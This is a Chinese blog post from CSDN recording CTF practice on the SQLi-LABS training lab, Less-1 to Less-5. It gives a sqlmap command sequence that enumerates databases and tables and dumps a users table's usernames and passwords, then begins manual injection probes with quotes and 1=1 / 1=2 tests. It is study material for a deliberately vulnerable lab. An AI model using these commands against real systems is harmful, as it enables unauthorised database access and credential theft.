二、CTF-Web-SQLi-Labs(记录CTF学习)

本文详细记录了在SQLi-LABS Page-1中的基础挑战,包括字符型、整数型、闭合方式不同及报错注入等方法的实战应用,涉及SQLMap工具和手动注入技巧,涵盖了数据库信息、表信息、列信息的爆破过程。
摘要由CSDN通过智能技术生成

目录

SQLi-LABS Page-1(Basic Challenges)

Less-1 **Error Based- String**(字符型注入')

Less-2 **Error Based- Intiger**(整数型注入)

Less-3 Error Based- String (with Twist)(闭合'))

Less-4 Error Based- DoubleQuotes String(闭合"))

Less-5 Double Query- Single Quotes- String(报错注入)


注1:首先要判断闭合方式

注2:一定要注意url地址栏的闭合符合中英文

注3:url编码:空格为20%,'为27%,#为23%

SQLi-LABS Page-1(Basic Challenges)

Less-1 **Error Based- String**(字符型注入')

        less-1 字符型注入_C4n的博客-CSDN博客_字符型注入

        https://www.cnblogs.com/Timesi/p/16659193.html

        方法一:SQLMAP注入

        (1)判断注入点

        sqlmap -u "url?id=1"

        (2)爆数据库信息

        sqlmap -u "url?id=1" --dbs

        (3)爆当前数据库信息(security)

        sqlmap -u "url?id=1" --current-db

        (4)爆指定数据库中所有表信息(users)

        sqlmap -u "url?id=1" -D security --tables

        (5)爆指定表的所有列的段名(username,password)

        sqlmap -u "url?id=1" -D security -T users --columns

        (6)爆表中所有内容(爆库)

        sqlmap -u "url?id=1" -D security -T users -C id,password,username --dump

        方法二:手工注入

        (1)判断注入点

        url?id=1’报错

        (2)判断注入类型

        如果是数字型注入:

        1 and 1=1 正确

        1 and 1=2 错误

        select * from table_name where id=xxx

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YangSNly

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值